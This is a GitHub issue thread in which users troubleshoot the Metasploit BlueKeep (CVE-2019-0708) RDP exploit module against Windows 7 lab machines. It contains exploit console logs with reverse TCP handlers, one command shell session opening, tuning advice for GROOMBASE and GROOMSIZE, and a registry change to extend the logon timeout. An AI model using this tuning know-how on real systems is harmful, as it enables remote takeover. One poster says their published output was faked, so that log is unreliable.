rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Issue #12299: CVE-2019-0708

Closed MazX0p closed 5 years ago

MazX0p commented 5 years ago

Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer

This is also the case when I try a physical machine.

Originally posted by @a62rzn in https://github.com/rapid7/metasploit-framework/pull/12283#issuecomment-529361538

Mkv4 commented 5 years ago

I tried with Win7 x64 Enterprise 6.1.7600 and VirtualBox 6.0.10 r132072 (Qt5.6.2) for Windows and also had this problem.

keisentraut commented 5 years ago

The hardcoded value of GROOMBASE for VirtualBox was wrong for me, too, when exploiting Win7 SP1 Build 7601 on VirtualBox 6.0 with a Win10 host. I didn't understand the exploit in detail, but I think GROOMBASE simply needs to be the start address of the NonPagedPool. I found this address by dumping the memory with VBoxManage and then running rekall as suggested by KevTheHermit on Twitter. Please see my blog for details of how I did it.

I had to reduce GROOMSIZE from the default of 250 to 50, too. I think the reason was that my VM had kind of limited RAM (2GB) assigned and 250 MB of grooming is too much, so the connection is reset before the actual exploit is triggered.

aoprea1982 commented 5 years ago

@keisentraut what Windows 7 are you using? Professional or Ultimate?

Your steps from the blog are working, but I keep getting bluescreens.

I'm using Win7 x64 SP1 Build 7601 Ultimate in virtualbox 6.10.12

[*] Started reverse TCP handler on 192.168.10.12:4444
[*] 192.168.10.11:3389    - Detected RDP on 192.168.10.11:3389    (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.10.11:3389    - The target is vulnerable.
[*] 192.168.10.11:3389 - Using CHUNK grooming strategy. Size 180MB, target address 0xfa800cc80000, Channel count 1.
[*] 192.168.10.11:3389 - Surfing channels ...
[*] 192.168.10.11:3389 - Lobbing eggs ...
[*] 192.168.10.11:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.   =>  blue screen on the target 

Changed GROOMBASE to the start of NonPagedPool in the exploit .rb and played with GROOMSIZE values.

You said 50, but the blog still shows 250 when it succeeds.

[*] 192.168.137.102:3389 - Using CHUNK grooming strategy. !!!!!! 250 not 50 => Size 250MB, !!!!!!!!target address  !0xfffffa8016400000, Channel count 1.
[*] 192.168.137.102:3389 - Surfing channels ...
[*] 192.168.137.102:3389 - Lobbing eggs ...
[*] 192.168.137.102:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 2 opened (192.168.137.101:4444 -> 192.168.137.102:49169 at 2019-09-09 19:54:59 +0200)

newxianlife commented 5 years ago

@keisentraut what Windows 7 are you using? Professional or Ultimate?

Your steps from the blog are working, but I keep getting bluescreens.

I'm using Win7 x64 SP1 Build 7601 Ultimate in virtualbox 6.10.12

"""
[*] Started reverse TCP handler on 192.168.10.12:4444
[*] 192.168.10.11:3389 - Detected RDP on 192.168.10.11:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.10.11:3389 - The target is vulnerable.
[*] 192.168.10.11:3389 - Using CHUNK grooming strategy. Size 180MB, target address 0xfa800cc80000, Channel count 1.
[*] 192.168.10.11:3389 - Surfing channels ...
[*] 192.168.10.11:3389 - Lobbing eggs ...
[*] 192.168.10.11:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created. => blue screen on the target
"""

Changed GROOMBASE to the start of NonPagedPool in the exploit .rb and played with GROOMSIZE values.

You said 50, but the blog still shows 250 when it succeeds.

"""
[*] 192.168.137.102:3389 - Using CHUNK grooming strategy. !!!!!! 250 not 50 => Size 250MB, !!!!!!!!target address !0xfffffa8016400000, Channel count 1.
[*] 192.168.137.102:3389 - Surfing channels ...
[*] 192.168.137.102:3389 - Lobbing eggs ...
[*] 192.168.137.102:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 2 opened (192.168.137.101:4444 -> 192.168.137.102:49169 at 2019-09-09 19:54:59 +0200)
"""

I got the same issue: Exploit completed, but no session was created.

MazX0p commented 5 years ago

The hardcoded value of GROOMBASE for VirtualBox was wrong for me, too, when exploiting Win7 SP1 Build 7601 on VirtualBox 6.0 with a Win10 host. I didn't understand the exploit in detail, but I think GROOMBASE simply needs to be the start address of the NonPagedPool. I found this address by dumping the memory with VBoxManage and then running rekall as suggested by KevTheHermit on Twitter. Please see my blog for details of how I did it.

I had to reduce GROOMSIZE from the default of 250 to 50, too. I think the reason was that my VM had kind of limited RAM (2GB) assigned and 250 MB of grooming is too much, so the connection is reset before the actual exploit is triggered.

Thank you, but I tried on my Win 7 machine and it still didn't work.

MazX0p commented 5 years ago

[*] Started reverse TCP handler on x.x.x.x:4444 
[*] x.x.x.x:3389    - Detected RDP on x.x.x.x:3389    (Windows version: 6.1.7600) (Requires NLA: No)
[+] x.x.x.x:3389    - The target is vulnerable.
[*] x.x.x.x:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa8009c00000, Channel count 1.
[*] x.x.x.x:3389 - Surfing channels ...
[*] 1x.x.x.x:3389 - Lobbing eggs ...
[-] x.x.x.x:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

dudumao520 commented 5 years ago

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > [*] 192.168.1.176:3389    - Detected RDP on 192.168.1.176:3389    (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.1.176:3389    - The target is vulnerable.
[*] 192.168.1.176:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 192.168.1.176:3389 - Surfing channels ...
[*] 192.168.1.176:3389 - Lobbing eggs ...
[-] 192.168.1.176:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer

zablah commented 5 years ago

I have the same issue, tested on Windows 7 Ultimate 64-bit in VirtualBox.

[*] Started reverse TCP handler on 192.168.10.3:4444 
[*] 192.168.10.17:3389    - Detected RDP on 192.168.10.17:3389    (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.10.17:3389    - The target is vulnerable.
[*] 192.168.10.17:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 192.168.10.17:3389 - Surfing channels ...
[*] 192.168.10.17:3389 - Lobbing eggs ...
[-] 192.168.10.17:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

keisentraut commented 5 years ago

I was using the following setup:

If you get "Connection reset", try changing GROOMSIZE. If you get BSODs, check if your GROOMBASE is correct. I only roughly understand the exploit, and do not intend to do more investigating, sorry.

PS: I "faked" the Metasploit output, because I wrote the blog article on another machine; that's why the output shows the non-working 250MB. Please note that there is nothing special about the 50MB, I just tried different values until it worked.

zablah commented 5 years ago

@keisentraut can you share the GROOMBASE and GROOMSIZE values? Also, can you explain how you found the correct values?

stountop commented 5 years ago

Windows will disconnect an RDP logon attempt if there is no user activity in the RDP logon window for a while. The default timeout for Windows Server 2003 is 120 seconds; the timeout for Windows Server 2008 R2/Win7 is 30 seconds. If the exploit does not send all the packets during this time, it will fail with this error. To test targets in low-bandwidth networks, you may add the following registry value to configure the timeout on the target system:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
Name: LogonTimeout (DWORD)
Decimal Value: 300 # 5 minutes

busterb commented 5 years ago

We added a few more targets before landing the module that might help (though they might not depending on the situation). I'm going to close this issue as is, let's work from the module that's in tree. I think probably PRs to improve module documentation would be very welcome!

BaelTD commented 5 years ago

Hello, I have the same issue. I have tried changing GROOMBASE (setting the groombase that was there before the update) and the chunk size:

50 MB: Blue Screen on Target
80 MB: Blue Screen on Target
100 MB: Blue Screen on Target
150 MB: Blue Screen on Target
180 MB: Blue Screen on Target
200 MB: Blue Screen on Target
250 MB: Forcing the USE of FREE'd object --> Blue Screen on Target

My target is: Win7 SP1 Ultimate, 2 GB RAM, 2 cores.

Using a 250 MB chunk the exploit goes further but doesn't open a reverse TCP session to the target.

Terminal:

[*] Started reverse TCP handler on 192.168.5.:4444
[+] 192.168.5.:3389 - The target is vulnerable.
[*] 192.168.5.:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.5.:3389 - Surfing channels ...
[*] 192.168.5.:3389 - Lobbing eggs ...
[*] 192.168.5.:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.

z0r0-max commented 5 years ago

I'm having the same issue. When I set GROOMSIZE to 1 MB, it says "Exploit completed, but no session was created". If I choose a larger GROOMSIZE like 2, 50, 100, 150, 200 or 250, I get "Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer".

Are there any solutions? I'm trying on Windows 7 Pro.

MzzdToT commented 4 years ago

bad guy, fk u man!

Rhaal commented 4 years ago

Running the exploit on a Windows Server 2008 R2 x64 machine with a Groomsize of 1MB will kill it: as soon as I get physical hold of the system I'll tell you if it's a BSOD or it caught fire and released a swarm of locusts.

AoG22 commented 4 years ago

Has anyone solved it?

mohds commented 3 years ago

Still an issue.